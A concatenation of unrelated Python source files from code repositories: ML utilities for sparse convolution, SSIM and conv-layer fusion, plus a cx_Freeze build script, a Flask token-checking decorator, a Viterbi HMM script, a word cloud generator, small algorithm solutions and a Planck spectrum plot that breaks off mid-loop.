        fmt = '{:' + str(num_digits) + 'd}'
        return '[' + fmt + '/' + fmt.format(num_batches) + ']'
def generate_idx(a,ori):
    """Gather 3x3 neighborhoods of ``ori`` at the nonzero positions of mask ``a``.

    Returns (pick, h_idx_1x1, w_idx_1x1) where ``pick`` has shape
    (9 * ori.size(1), n_active) — one column of flattened 3x3 patch values per
    active mask position — ready for a dense matmul with a flattened kernel.

    NOTE(review): ``a`` is modified in place (its active cells are overwritten
    with 1-based running indices), and ``idx_s2s`` is computed but never
    returned — confirm both are intentional.
    """
    # Offsets -? actually 0..2 row/col shifts used to expand each center to a 3x3 window.
    A = torch.arange(3).view(-1, 1, 1)
    mask_indices = torch.nonzero(a.squeeze())
    # indices: dense to sparse (1x1) — row/col of each active mask position
    h_idx_1x1 = mask_indices[:, 0]
    w_idx_1x1 = mask_indices[:, 1]
    # indices: dense to sparse (3x3) — expand each center into its 9 neighbors
    mask_indices_repeat = mask_indices.unsqueeze(0).repeat([3, 1, 1]) + A
    h_idx_3x3 = mask_indices_repeat[..., 0].repeat(1, 3).view(-1)
    w_idx_3x3 = mask_indices_repeat[..., 1].repeat(3, 1).view(-1)
    # indices: sparse to sparse (3x3) — 1-based so 0 still means "inactive"
    indices = torch.arange(float(mask_indices.size(0))).view(1, -1).to(a.device) + 1
    a[0, 0, h_idx_1x1, w_idx_1x1] = indices
    idx_s2s = F.pad(a, [1, 1, 1, 1])[0, :, h_idx_3x3, w_idx_3x3].view(9, -1).long()
    # Zero-pad so 3x3 windows at the border stay in bounds, then gather values.
    pick = F.pad(ori, [1, 1, 1, 1])[0, :, h_idx_3x3, w_idx_3x3].view(9 * ori.size(1), -1)
    return pick,h_idx_1x1,w_idx_1x1
def sparse_conv(ori, pick, k, h_idx_1x1, w_idx_1x1):
    """Apply a k x k convolution only at the sparse positions given by
    (h_idx_1x1, w_idx_1x1), using patch columns pre-gathered in ``pick``.

    NOTE(review): a fresh nn.Conv2d is created here, so the kernel is randomly
    initialized on every call — this looks like a timing/shape experiment, not
    a trained layer; confirm before reuse.
    """
    conv3x3 = nn.Conv2d(1,3,k,padding=k//2)
    # Flatten the kernel to (out_channels, k*k) for a dense matmul.
    kernel = conv3x3.weight.data.view(3, -1)
    # One matmul computes all sparse outputs at once: (3, k*k) @ (k*k, n).
    sparse_out = torch.mm(kernel, pick)
    # Broadcast the single-channel input to 3 channels, then scatter results back.
    ori = ori.repeat((1,3,1,1))
    ori[0, :, h_idx_1x1, w_idx_1x1] = sparse_out
    return ori
import numpy as np
from PIL import Image
from scipy.signal import convolve2d
def matlab_style_gauss2D(shape=(3,3),sigma=0.5):
    """Build a normalized 2-D Gaussian kernel identical to MATLAB's
    fspecial('gaussian', shape, sigma)."""
    half_rows, half_cols = ((dim - 1.0) / 2.0 for dim in shape)
    ys, xs = np.ogrid[-half_rows:half_rows + 1, -half_cols:half_cols + 1]
    kernel = np.exp(-(xs * xs + ys * ys) / (2.0 * sigma * sigma))
    # Zero out negligible entries, exactly as fspecial does.
    kernel[kernel < np.finfo(kernel.dtype).eps * kernel.max()] = 0
    total = kernel.sum()
    if total != 0:
        kernel /= total
    return kernel
def filter2(x, kernel, mode='same'):
    """2-D correlation, matching MATLAB's filter2: convolving with the kernel
    rotated by 180 degrees is equivalent to correlating with the kernel."""
    flipped = np.rot90(kernel, 2)
    return convolve2d(x, flipped, mode=mode)
def compute_ssim(im1, im2, k1=0.01, k2=0.03, win_size=11, L=255):
    """Single-channel SSIM between two equally-sized images (MATLAB-style).

    Uses a win_size x win_size Gaussian window (sigma=1.5) and the standard
    stabilizing constants C1=(k1*L)^2, C2=(k2*L)^2, with L the dynamic range
    (255 for 8-bit images).

    Raises:
        ValueError: if the images differ in shape or are not single-channel.

    Returns:
        float: mean SSIM over the valid (un-padded) region.
    """
    if not im1.shape == im2.shape:
        raise ValueError("Input Images must have the same dimensions")  # fixed typo: "Imagees"
    if len(im1.shape) > 2:
        raise ValueError("Please input the images with 1 channel")
    C1 = (k1*L)**2
    C2 = (k2*L)**2
    window = matlab_style_gauss2D(shape=(win_size,win_size), sigma=1.5)
    # The kernel is already normalized; this second pass is a numerical no-op
    # kept for exact parity with the reference implementation.
    window = window/np.sum(np.sum(window))
    # Work in float to avoid uint8 overflow in the products below.
    if im1.dtype == np.uint8:
        im1 = np.double(im1)
    if im2.dtype == np.uint8:
        im2 = np.double(im2)
    # Local means, variances and covariance via Gaussian filtering.
    mu1 = filter2(im1, window, 'valid')
    mu2 = filter2(im2, window, 'valid')
    mu1_sq = mu1 * mu1
    mu2_sq = mu2 * mu2
    mu1_mu2 = mu1 * mu2
    sigma1_sq = filter2(im1*im1, window, 'valid') - mu1_sq
    sigma2_sq = filter2(im2*im2, window, 'valid') - mu2_sq
    sigmal2 = filter2(im1*im2, window, 'valid') - mu1_mu2
    ssim_map = ((2*mu1_mu2+C1) * (2*sigmal2+C2)) / ((mu1_sq+mu2_sq+C1) * (sigma1_sq+sigma2_sq+C2))
    return np.mean(np.mean(ssim_map))
def collapse_2layer(f1,f1b,f2,f2b):
    """Fuse two consecutive conv layers (weights f1/f2, biases f1b/f2b) into a
    single equivalent conv weight/bias pair.

    Returns (weight_collapse, bia1_combi); the bias is None when f1b is None.
    NOTE(review): requires CUDA (``.to('cuda')``); the bias merge sums f2's
    kernel over its spatial taps — confirm the layer geometry this assumes
    against the calling code.
    """
    weight_tmp = f1
    new_bias = f1b
    weight3 = f2
    bias3 = f2b
    # Flatten spatial dims so each input channel is merged independently.
    weight_tmp_ = weight_tmp.view(weight_tmp.size(0), weight_tmp.size(1), weight_tmp.size(2) * weight_tmp.size(3))
    weight3_ = weight3.view(weight3.size(0), weight3.size(1) * weight3.size(2) * weight3.size(3))
    new_weight_ = torch.Tensor(weight3.size(0), weight_tmp.size(1), weight_tmp.size(2)*weight_tmp.size(3)).to('cuda')
    for i in range(weight_tmp.size(1)):
        # Project layer-1's response for input channel i through layer-2's kernels.
        tmp = weight_tmp_[:, i, :].view(weight_tmp.size(0), weight_tmp.size(2) * weight_tmp.size(3))
        new_weight_[:, i, :] = torch.matmul(weight3_, tmp)
    weight_combi = new_weight_.view(weight3.size(0), weight_tmp.size(1), weight_tmp.size(2), weight_tmp.size(3))
    # weight_combi = torch.matmul(weight3_tmp, weight_tmp_tmp).view((weight3.shape[0],weight_tmp.shape[1],weight_tmp.shape[2],weight_tmp.shape[3]))
    bia1_combi = None
    # bias merge: propagate the first layer's bias through the second conv.
    if new_bias is not None:
        bia1_combi = torch.matmul(weight3.view((weight3.shape[0], weight3.shape[1], -1)).sum(2), new_bias) + bias3
    weight_collapse = weight_combi
    return weight_collapse, bia1_combi
def collapse_CollapseLayer(f1,f1b,f2,f2b,f3,f3b):
    """Fuse three consecutive conv layers into one equivalent weight/bias pair.

    Layers 1 and 2 are merged analytically via ``conv_transpose2d``, then the
    result is merged with layer 3 channel-by-channel. Requires CUDA.

    NOTE(review): when bias1 is not None but bias2 is None, ``new_bias`` ends
    up None yet the final bias merge still multiplies it — a latent TypeError
    path; confirm callers never hit that combination.
    """
    weight1 = f1
    bias1 = f1b
    weight2 = f2
    bias2 = f2b
    weight3 = f3
    bias3 = f3b
    # Merge bias1 through layer 2 (each layer-2 kernel summed over its taps).
    w_s_2_tmp = weight2.view(weight2.size(0), weight2.size(1), weight2.size(2) * weight2.size(3))
    if bias1 is not None and bias2 is not None:
        b_sum = torch.sum(w_s_2_tmp, dim=2)
        new_bias = torch.matmul(b_sum, bias1) + bias2
    elif bias1 is None:
        new_bias = bias2 #without Bias
    else:
        new_bias = None
    # Composing two convolutions equals a transposed-conv of their kernels.
    weight_tmp = F.conv_transpose2d(weight2, weight1)
    # weight merge
    # weight_tmp = weight_tmp.view((weight_tmp.shape[0], -1))
    # weight3 = weight3.view((weight3.shape[0], -1))
    weight_tmp_ = weight_tmp.view(weight_tmp.size(0), weight_tmp.size(1), weight_tmp.size(2) * weight_tmp.size(3))
    weight3_ = weight3.view(weight3.size(0), weight3.size(1) * weight3.size(2) * weight3.size(3))
    new_weight_ = torch.Tensor(weight3.size(0), weight_tmp.size(1), weight_tmp.size(2)*weight_tmp.size(3)).to('cuda')
    for i in range(weight_tmp.size(1)):
        tmp = weight_tmp_[:, i, :].view(weight_tmp.size(0), weight_tmp.size(2) * weight_tmp.size(3))
        new_weight_[:, i, :] = torch.matmul(weight3_, tmp)
    weight_combi = new_weight_.view(weight3.size(0), weight_tmp.size(1), weight_tmp.size(2), weight_tmp.size(3))
    # weight_combi = torch.matmul(weight3_tmp, weight_tmp_tmp).view((weight3.shape[0],weight_tmp.shape[1],weight_tmp.shape[2],weight_tmp.shape[3]))
    bia1_combi = None
    # bias merge: push the 1+2 bias through layer 3's summed kernels.
    if bias1 is not None:
        bia1_combi = torch.matmul(weight3.view((weight3.shape[0], weight3.shape[1], -1)).sum(2), new_bias) + bias3
    weight_collapse = weight_combi
    return weight_collapse, bia1_combi
def collapse_Skip(weight_tmp,new_bias,f3,f3b, residual=False):
    """Fuse an already-collapsed layer (weight_tmp/new_bias) with a following
    conv f3/f3b; optionally absorb an identity skip connection.

    With ``residual=True`` an identity kernel (1 at the spatial center of each
    matching in/out channel) is added so the fused conv also carries x itself.
    Requires CUDA.

    NOTE(review): the bias merge ``torch.matmul(weight3_, new_bias)`` only
    lines up dimensionally when f3 is a 1x1 conv — confirm against callers.
    """
    weight3 = f3
    bias3 = f3b
    # weight merge: channel-by-channel projection of weight_tmp through f3.
    weight_tmp_ = weight_tmp.view(weight_tmp.size(0), weight_tmp.size(1), weight_tmp.size(2) * weight_tmp.size(3))
    weight3_ = weight3.view(weight3.size(0), weight3.size(1) * weight3.size(2) * weight3.size(3))
    new_weight_ = torch.Tensor(weight3.size(0), weight_tmp.size(1), weight_tmp.size(2)*weight_tmp.size(3)).to('cuda')
    for i in range(weight_tmp.size(1)):
        tmp = weight_tmp_[:, i, :].view(weight_tmp.size(0), weight_tmp.size(2) * weight_tmp.size(3))
        new_weight_[:, i, :] = torch.matmul(weight3_, tmp)
    weight_combi = new_weight_.view(weight3.size(0), weight_tmp.size(1), weight_tmp.size(2), weight_tmp.size(3))
    if new_bias is not None and bias3 is not None:
        new_bias = torch.matmul(weight3_, new_bias) + bias3 # with bias
    elif new_bias is None:
        new_bias = bias3 #without Bias
    else:
        new_bias = None
    # weight_combi = torch.matmul(weight3_tmp, weight_tmp_tmp).view((weight3.shape[0],weight_tmp.shape[1],weight_tmp.shape[2],weight_tmp.shape[3]))
    bia1_combi = new_bias
    weight_collapse = weight_combi  # NOTE: dead assignment — overwritten by both branches below
    if residual:
        # residual merge: build an identity kernel with a 1 at the spatial center.
        outDims, kernel_size = weight_combi.shape[0],weight_combi.shape[3]
        weight_residual = torch.zeros(weight_combi.shape).cuda()
        if kernel_size == 3:
            idx = 1
        if kernel_size == 5:
            idx = 2
        for i in range(outDims):
            weight_residual[i,i,idx,idx] = 1
        # residual combi: fused conv now also passes the input straight through.
        weight_collapse = weight_residual + weight_combi
    else:
        weight_collapse = weight_combi
    return weight_collapse, bia1_combi
def time_test(net, input, device, isMeta=False, meta=None, prior=None):
    """Run one forward pass of *net* and measure its wall-clock time.

    On CUDA the device is synchronized before and after the pass so the
    measured interval covers the actual kernel execution. Meta-networks take
    a (input, meta, prior) tuple and return (prediction, extra).

    Returns:
        (prediction, elapsed_seconds)
    """
    on_gpu = (device == 'cuda')
    if on_gpu:
        torch.cuda.synchronize()
    tik = time.time()
    if isMeta:
        pre_y, _ = net((input, meta, prior))
    else:
        pre_y = net(input)
    if on_gpu:
        torch.cuda.synchronize()
    tok = time.time() - tik
    return pre_y, tok
def remove_prefix(state_dict_):
    """Strip the leading 'module.' (DataParallel) prefix from checkpoint keys,
    leaving keys that genuinely start with 'module_list' untouched."""
    stripped = {}
    for key, value in state_dict_.items():
        drop = key.startswith('module') and not key.startswith('module_list')
        stripped[key[7:] if drop else key] = value
    return stripped
class GradualWarmupScheduler(_LRScheduler):
    """ Gradually warm-up(increasing) learning rate in optimizer.
    Proposed in 'Accurate, Large Minibatch SGD: Training ImageNet in 1 Hour'.
    Args:
        optimizer (Optimizer): Wrapped optimizer.
        multiplier: target learning rate = base lr * multiplier if multiplier > 1.0. if multiplier = 1.0, lr starts from 0 and ends up with the base_lr.
        total_epoch: target learning rate is reached at total_epoch, gradually
        after_scheduler: after target_epoch, use this scheduler(eg. ReduceLROnPlateau)
    """
    def __init__(self, optimizer, multiplier, total_epoch, after_scheduler=None):
        self.multiplier = multiplier
        if self.multiplier < 1.:
            # (sic: "thant" typo kept — changing the message would alter runtime behavior)
            raise ValueError('multiplier should be greater thant or equal to 1.')
        self.total_epoch = total_epoch
        self.after_scheduler = after_scheduler
        # Becomes True once warm-up has handed over to after_scheduler.
        self.finished = False
        super(GradualWarmupScheduler, self).__init__(optimizer)
    def get_lr(self):
        """Linear warm-up until total_epoch, then delegate to after_scheduler
        (whose base LRs are rescaled once, on the first post-warm-up call)."""
        if self.last_epoch > self.total_epoch:
            if self.after_scheduler:
                if not self.finished:
                    # One-time hand-over: the follow-up scheduler starts from
                    # the fully warmed-up learning rates.
                    self.after_scheduler.base_lrs = [base_lr * self.multiplier for base_lr in self.base_lrs]
                    self.finished = True
                return self.after_scheduler.get_last_lr()
            return [base_lr * self.multiplier for base_lr in self.base_lrs]
        if self.multiplier == 1.0:
            # Ramp from 0 up to base_lr.
            return [base_lr * (float(self.last_epoch) / self.total_epoch) for base_lr in self.base_lrs]
        else:
            # Ramp from base_lr up to base_lr * multiplier.
            return [base_lr * ((self.multiplier - 1.) * self.last_epoch / self.total_epoch + 1.) for base_lr in self.base_lrs]
    def step_ReduceLROnPlateau(self, metrics, epoch=None):
        """step() variant for a ReduceLROnPlateau follow-up scheduler, which
        needs the validation metric and is stepped at epoch end."""
        if epoch is None:
            epoch = self.last_epoch + 1
        self.last_epoch = epoch if epoch != 0 else 1  # ReduceLROnPlateau is called at the end of epoch, whereas others are called at beginning
        if self.last_epoch <= self.total_epoch:
            warmup_lr = [base_lr * ((self.multiplier - 1.) * self.last_epoch / self.total_epoch + 1.) for base_lr in self.base_lrs]
            for param_group, lr in zip(self.optimizer.param_groups, warmup_lr):
                param_group['lr'] = lr
        else:
            # NOTE(review): ``epoch`` can no longer be None here (set above) —
            # this branch always takes the else path; confirm intended.
            if epoch is None:
                self.after_scheduler.step(metrics, None)
            else:
                self.after_scheduler.step(metrics, epoch - self.total_epoch)
    def step(self, epoch=None, metrics=None):
        """Dispatch to the right stepping strategy for the follow-up scheduler."""
        if type(self.after_scheduler) != ReduceLROnPlateau:
            if self.finished and self.after_scheduler:
                if epoch is None:
                    self.after_scheduler.step(None)
                else:
                    # Follow-up scheduler counts epochs from the end of warm-up.
                    self.after_scheduler.step(epoch - self.total_epoch)
                self._last_lr = self.after_scheduler.get_last_lr()
            else:
                return super(GradualWarmupScheduler, self).step(epoch)
        else:
            self.step_ReduceLROnPlateau(metrics, epoch)
def reduce_tensor(tensor, world_size):
    """Average a tensor across all distributed workers.

    Clones first so the caller's tensor is left untouched, all-reduces the
    clone with SUM over the default process group, then divides by the world
    size to obtain the mean. Requires torch.distributed to be initialized.
    """
    rt = tensor.clone()
    dist.all_reduce(rt, op=dist.ReduceOp.SUM)
    rt /= world_size
    return rt
if __name__ == "__main__":
    # Quick manual check: SSIM between two images in the working directory.
    im1 = Image.open("1.png")
    im2 = Image.open("2.png")
    print(compute_ssim(np.array(im1),np.array(im2)))
| Lumos-Leo/SRGFS_test | Utils/CommonUtils.py | CommonUtils.py | py | 29,482 | python | en | code | 0 | github-code | 50 |
from cx_Freeze import setup, Executable

# cx_Freeze build script for pylans: `python cxfsetup.py build` produces a
# frozen pylans.exe from pylans-launcher.py.

# Modules excluded from the frozen bundle to keep it small — GUI toolkits and
# other packages pylans does not use at runtime.
# NOTE(review): 'email' is listed twice; the duplicate is harmless.
options = dict(
    excludes =
    ['_gtkagg', '_tkagg', 'bsddb', 'email', 'pywin.debugger',
    'pywin.debugger.dbgcon', 'pywin.dialogs', 'tcl',
    'Tkconstants', 'Tkinter','tk','tkinter','ttk','curses','email',
    ],
    )

# Console executable built from the launcher script (base=None -> console app).
exe = Executable(
    script="pylans-launcher.py",
    initScript = None,
    base = None,
#    targetDir = r"cxdist",
    targetName = "pylans.exe",
    compress = True,
#    copyDependentFiles = True,
    appendScriptToExe = False,
    appendScriptToLibrary = False,
    icon = None
    )

setup(
    name = "pylans!",
    version = "0.0.2",
    author = 'Brian Parma',
    description = "Python p2p VPN Tunnel",
    executables = [exe],
    options = {'build_exe': options},
    )
| bj0/pylans | cxfsetup.py | cxfsetup.py | py | 799 | python | en | code | 6 | github-code | 50 |
34873217783 | #!/usr/bin/env python2
# -*- coding:utf-8 -*-
"""
[NAME]
Scannerクラスの定義
[DESCRIPTION]
Scannerクラスの定義
"""
import datetime
from schema import Scanner, Person, Exp
def start_batch(batch):
    """Begin a measurement batch.

    Computes the scan window (now .. now + batch.h_scan hours), stamps every
    experiment with the start time, assigns each scanner its experiments and
    operator, and flips the batch status to "monitoring".
    """
    now = datetime.datetime.now()
    finish = now + datetime.timedelta(hours=batch.h_scan)
    person = Person(batch.person_id)
    # Group experiment ids per scanner; entries look like "sid-sind:exp_id"
    # joined by '|'.
    scanner_exps = {}
    for entry in batch.pos2exp_id.split("|"):
        pos, exp_id = entry.split(":")
        sid, _sub_index = [int(part) for part in pos.split("-")]
        scanner_exps.setdefault(sid, []).append(exp_id)
        # Stamp the experiment with the batch start time.
        exp = Exp(int(exp_id))
        exp.dt_start = now
        exp.update()
    for sid, exp_ids in scanner_exps.items():
        scanner = Scanner(sid)
        scanner.batch_id = batch.id
        scanner.person_name = person.name
        scanner.dt_start = now
        scanner.dt_finish = finish
        scanner.exp_ids = "|".join(exp_ids)
        scanner.update()
    batch.dt_start = now
    batch.status = "monitoring"
    batch.update()
def cancel_batch(batch):
    """Cancel a batch before it runs: release its scanners and re-queue it."""
    scanner_ids = {int(entry.split(":")[0].split("-")[0])
                   for entry in batch.pos2exp_id.split("|")}
    for sid in scanner_ids:
        Scanner(sid).clean()
    batch.status = "waiting the experiment"
    batch.update()
def abort_batch(batch):
    """Stop a running batch: freeze each scanner's finish time at the moment
    of the abort and mark the batch done."""
    scanner_ids = {int(entry.split(":")[0].split("-")[0])
                   for entry in batch.pos2exp_id.split("|")}
    for sid in scanner_ids:
        scanner = Scanner(sid)
        # The finish time becomes the instant the operator aborted.
        scanner.dt_finish = datetime.datetime.now()
        scanner.update()
    batch.status = "Done"
    batch.update()
if __name__ == "__main__":
    # No standalone behavior; this module is driven by the batch workflow above.
    pass
| takeriki/colonylive | clive/db/control.py | control.py | py | 1,971 | python | en | code | 0 | github-code | 50 |
30210939337 | # coding=utf-8
import ast
from app import app, db
from flask import request
from functools import wraps
from app.api.utils.utils import BaseUtils
from app.models.base_token import BaseToken
from app.models.base_customer import BaseCustomer
from app.api.utils.responses import BaseResponse
class BaseDecorator(object):
    """Collection of view decorators shared by all webservices.

    The methods below are applied as decorators at class-definition time, so
    they intentionally receive the wrapped view ``f`` instead of ``self``.
    """

    def __init__(self):
        """Constructor (the class is stateless)."""
        pass

    def validate_token(f):
        """Allow the request only when its access token exists, is active and
        belongs to the requesting customer; otherwise answer permission_denied.
        Passes the customer id to the wrapped view."""
        @wraps(f)
        def decorated(*args, **kwargs):
            data = BaseUtils.get_data(request=request)
            response = BaseResponse(base_customer=data['base_customer'], data=data)
            try:
                query_token = db.session.query(BaseToken) \
                    .filter(
                        BaseToken.api_token == data["access_token"],
                        BaseToken.status == True
                    ).first()
            except Exception:
                # NOTE(review): was a bare except; any DB failure is treated
                # as a denial — confirm this is the desired policy.
                return response.permission_denied()
            if query_token:
                if query_token.base_customer != data['base_customer']:
                    return response.permission_denied()
                return f(data['base_customer'], *args, **kwargs)
            return response.permission_denied()
        return decorated

    def validate_token_system(f):
        """Allow the request only for an existing customer presenting the
        application-wide SECRET_KEY as the access token."""
        @wraps(f)
        def decorated(*args, **kwargs):
            data = BaseUtils.get_data(request=request)
            response = BaseResponse(base_customer=data['base_customer'], data=data)
            try:
                query_user = db.session.query(BaseCustomer.id) \
                    .filter(
                        BaseCustomer.id == data['base_customer'],
                    ).first()
            except Exception:  # NOTE(review): was a bare except
                return response.server_error()
            if not query_user:
                return response.permission_denied()
            if data['access_token'] == app.config['SECRET_KEY']:
                return f(query_user.id, *args, **kwargs)
            return response.permission_denied()
        return decorated

    def system(f):
        """Validate the common request envelope (id for PUT requests, customer
        id, access token) before handing the parsed data to the view."""
        @wraps(f)
        def decorated(*args, **kwargs):
            data = BaseUtils.get_data(request=request)
            response = BaseResponse(base_customer=data['base_customer'], data=data)
            # Bug fix: ``in ('PUT')`` tested substring membership in the
            # string 'PUT' (so 'P', 'U', 'PU', ... also matched); use a tuple.
            if data["method"] in ('PUT',):
                if not data["id"]:
                    return response.permission_denied()
            if not data["base_customer"]:
                return response.base_customer_is_missing()
            if not data["access_token"]:
                return response.token_is_missing()
            return f(data, *args, **kwargs)
        return decorated
import numpy as np  # Numerical Python functions
# GGCACTGAACTGAATACAGC is our sequence, encoded A,C,G,T = 0,1,2,3.
# NOTE(review): the comment shows 20 bases but Seq below has 21 entries —
# confirm which is intended.
Seq = [2,2,1,0,1,3,2,0,0,1,3,2,0,1,3,3,0,1,0,2,1] #Sequence
HLSeq = np.zeros((len(Seq),2)) #Store optimal sequences as we progress (0=High, 1=Low)
HLSeq[:,1] += 1 #Defaults are all low, all high
Hi = [.2,.3,.3,.2] #Probabilities for nucleotides in High state
Lo = [.3,.2,.2,.3] #Probabilities for nucleotides in Low state
HLT = [[.5,.5],[.4,.6]] #Matrix of transition probabilities between High&Low states
currProb = np.array([.5*Hi[Seq[0]],.5*Lo[Seq[0]]]) #Stores current H&L probabilities (uniform .5/.5 prior)
currProb = currProb.reshape(2,1) #change to 2X1 matrix
Prob = [[1,1],[1,1]] #Stores all 4 calculated probabilities at each stage
##### Compute trellis: Viterbi forward pass, keeping only the best path into
##### each of the two states at every position.
for k in range(1,len(Seq)):
    HiLo = np.array( [Hi[Seq[k]],Lo[Seq[k]]] ) #Current nucleotide probabilities in H&L
    HiLo = HiLo.reshape(1,2) #change to a 1X2 matrix
    Prob = (currProb@HiLo)*HLT #matrix mult. between currProb and HiLo, then item by item mult. by HLT
    currProb[0,0],currProb[1,0] = Prob[0,0],Prob[1,1] #default: stay in the same state
    if Prob[1,0]> Prob[0,0]: #Update sequence ending in 0 (High); switch history if Low->High wins
        HLSeq[0:k,0] = HLSeq[0:k,1]
        currProb[0,0] = Prob[1,0]
    if Prob[0,1] > Prob[1,1]: #Update sequence ending in 1 (Low); switch history if High->Low wins
        HLSeq[0:k,1] = HLSeq[0:k,0]
        currProb[1,0] = Prob[0,1]
##### Finished: choose optimal from final two options
if currProb[0,0] >= currProb[1,0]:
    FinalSeq = HLSeq[:,0] #High/Low states history ending with 0 (High)
else:
    FinalSeq = HLSeq[:,1] #High/Low states history ending with 1 (Low)
FinalSeq = list(FinalSeq)
# Map numeric states to labels (0 -> High, 1 -> Low) for display.
for k in range(0,len(Seq)):
    if FinalSeq[k]==0:
        FinalSeq[k]="High"
    else:
        FinalSeq[k]="Low"
print(FinalSeq)
551370559 | from typing import List, Dict
import string
import re
from collections import Counter
from wordcloud import WordCloud
from PIL import Image
import numpy as np
import matplotlib.pyplot as plt
from nltk.corpus import stopwords
from nltk.stem import WordNetLemmatizer, PorterStemmer
from nltk.tokenize import word_tokenize
class WordCloudGenerator:
    """Generates a word cloud from a given text or file path."""
    def __init__(self, text: str = None, file_path: str = None) -> None:
        """
        Constructor for the WordCloudGenerator class.

        Args:
            text (str, optional): The text to be used for generating the word cloud.
            file_path (str, optional): The path to the text file to be used for generating the word cloud.

        NOTE(review): if neither argument is given, ``self.text`` is never set
        and every later call will raise AttributeError — confirm callers
        always pass one of the two.
        """
        if text is not None:
            self.text = text
        elif file_path is not None:
            with open(file_path, 'r') as f:
                self.text = f.read()
    def clean_text(self, text: str=None) -> str:
        """
        Cleans the input text by removing special characters and stop words, and performing stemming and lemmatization.

        Args:
            text (str): The text to be cleaned. Defaults to the instance text.

        Returns:
            str: The cleaned text (space-joined stemmed/lemmatized tokens).
        """
        if text is None:
            text = self.text
        # English-only pipeline: NLTK stopwords, WordNet lemmatizer (verb POS),
        # then Porter stemming on the lemma.
        stop_words = set(stopwords.words('english'))
        wordnet_lemmatizer = WordNetLemmatizer()
        porter_stemmer = PorterStemmer()
        # remove punctuation and convert to lowercase
        text = text.translate(str.maketrans('', '', string.punctuation)).lower()
        # remove stopwords and lemmatize/stem the words
        words = word_tokenize(text)
        words = [porter_stemmer.stem(wordnet_lemmatizer.lemmatize(word, pos='v'))
                 for word in words if word not in stop_words]
        # return cleaned text as string
        return ' '.join(words)
    def get_word_counts(self, text: str=None) -> Dict[str, int]:
        """
        Counts the frequency of each (cleaned) word in the input text.

        Args:
            text (str): The text to be analyzed. Defaults to the instance text.

        Returns:
            dict: A dictionary mapping word -> occurrence count.
        """
        if text is None:
            text = self.text
        words = self.clean_text(text).split()
        return dict(Counter(words))
    def get_top_n_words(self, text: str=None, n: int=1) -> List[str]:
        """
        Returns the n most frequent words in the input text.

        Args:
            text (str): The text to be analyzed. Defaults to the instance text.
            n (int): The number of top words to return.

        Returns:
            list: A list containing the n most frequent words, most frequent first.
        """
        if text is None:
            text = self.text
        word_counts = self.get_word_counts(text)
        return [word for word, count in sorted(word_counts.items(), key=lambda item: item[1], reverse=True)[:n]]
    def get_word_frequencies(self, text: str=None) -> Dict[str, float]:
        """
        Calculates the relative frequency of each word in the input text.

        Args:
            text (str): The text to be analyzed. Defaults to the instance text.

        Returns:
            dict: A dictionary mapping word -> count / total word count.
        """
        if text is None:
            text = self.text
        words = self.clean_text(text).split()
        word_counts = Counter(words)
        total_words = sum(word_counts.values())
        return {word: count / total_words for word, count in word_counts.items()}
    def get_word_cloud_image(self, text: str=None, mask_image: np.ndarray = None) -> Image.Image:
        """
        Generates a word cloud image from the input text.

        Args:
            text (str): The text to be analyzed. Defaults to the instance text.
            mask_image (np.ndarray, optional): A mask image to use for the word cloud.

        Returns:
            Image.Image: The generated 800x400 word cloud image (white background).
        """
        if text is None:
            text = self.text
        word_frequencies = self.get_word_frequencies(text)
        word_cloud = WordCloud(width=800, height=400, background_color='white', mask=mask_image).generate_from_frequencies(word_frequencies)
        return word_cloud.to_image()
    def plot_word_cloud(self, text: str=None, mask_image: np.ndarray = None) -> None:
        """
        Plots a word cloud image from the input text using matplotlib.

        Args:
            text (str): The text to be analyzed. Defaults to the instance text.
            mask_image (np.ndarray, optional): A mask image to use for the word cloud.
        """
        if text is None:
            text = self.text
        word_cloud_image = self.get_word_cloud_image(text, mask_image)
        plt.imshow(word_cloud_image)
        plt.axis('off')
        plt.show()
class Node:
    """A binary-search-tree node holding key ``d`` with left/right children."""

    def __init__(self, x):
        self.d = x      # stored key
        self.l = None   # left child
        self.r = None   # right child
def Insert(node, x):
    """Insert key *x* into the BST rooted at *node* (duplicates go right);
    return the (possibly new) root."""
    if node is None:
        return Node(x)
    if x < node.d:
        node.l = Insert(node.l, x)
    else:
        node.r = Insert(node.r, x)
    return node
def IscompleteBinary(node, i, N):
    """Check heap-style completeness: with the root at array index 0 and
    children at 2i+1 / 2i+2, every node's index must stay below N, the total
    node count. An empty subtree is trivially complete."""
    if node is None:
        return True
    if i >= N:
        return False
    left_ok = IscompleteBinary(node.l, 2 * i + 1, N)
    right_ok = IscompleteBinary(node.r, 2 * i + 2, N)
    return left_ok and right_ok
# Driver: first line is the number of test cases; each case gives N and then
# N keys which are inserted into a fresh BST in order.
for _ in range(int(input())):
    N = int(input())
    arr = list(map(int,input().split()))
    node = Node(arr[0])
    for i in range(1,N):
        node = Insert(node,arr[i])
    # The BST is "complete" iff every node's heap index fits below N.
    if IscompleteBinary(node,0,N):
        print('Yes')
    else:
        print('No')
| riteshsethia7/Codes | Trees/Is_Complete_Binary_Tree.py | Is_Complete_Binary_Tree.py | py | 751 | python | en | code | 0 | github-code | 50 |
class Solution:
    """LeetCode 1353 — Maximum Number of Events That Can Be Attended."""

    def maxEvents(self, events):
        """Greedy: handle events in order of earliest end day and attend each
        on the first still-free day inside its [start, end] window.

        Note: sorts *events* in place, matching the original behavior.
        Returns the number of events attended.
        """
        events.sort(key=lambda ev: ev[1])  # earliest deadline first
        attended_days = set()
        for start, end in events:
            for day in range(start, end + 1):
                if day not in attended_days:
                    attended_days.add(day)
                    break
        return len(attended_days)
| 2448845600/LeetCodeDayDayUp | LeetCode题解/weekly-contest-176/3-id5342.py | 3-id5342.py | py | 305 | python | en | code | 4 | github-code | 50 |
# -*- coding: utf-8 -*-
"""
Listing 10-3. PLANCKSSOLARSPECTRUM

Plots Planck's black-body spectral emittance for a 5800 K sun, integrates it
to estimate the total solar output, and annotates the visible band and a
narrow 1.5 um sample band on the figure.
"""
import numpy as np, matplotlib.pyplot as plt
plt.close('all')
plt.axis([0,3,0,100])
plt.xlabel('Wavelength $\lambda$ ($\mu$m)')
plt.ylabel('S($\lambda$) (MW/m$^{3}$) x 10^-6')
plt.grid(True)
plt.title('Max Plancks Solar Spectrum')
# Physical constants
c=2.9979*(10.**8) #m/s - speed of light in a vacuum
h=6.63*(10.**-34) #Js - Planck's constant
kb=1.38*(10**-23) #J/K - Boltzmann's constant
e=.985 #emissivity
t=5800. # K - effective surface temperature of the sun
# NOTE(review): 'e' is immediately reassigned; only .984 is actually used.
e=.984
# Wavelength sweep: 0.01 um to 10 um in 0.01 um steps.
lamin=.01*10**-6
lamax=10.*10**-6
dla=.01*10**-6
st=0. # running integral of S(lambda) d(lambda)
for la in np.arange(lamin,lamax,dla):
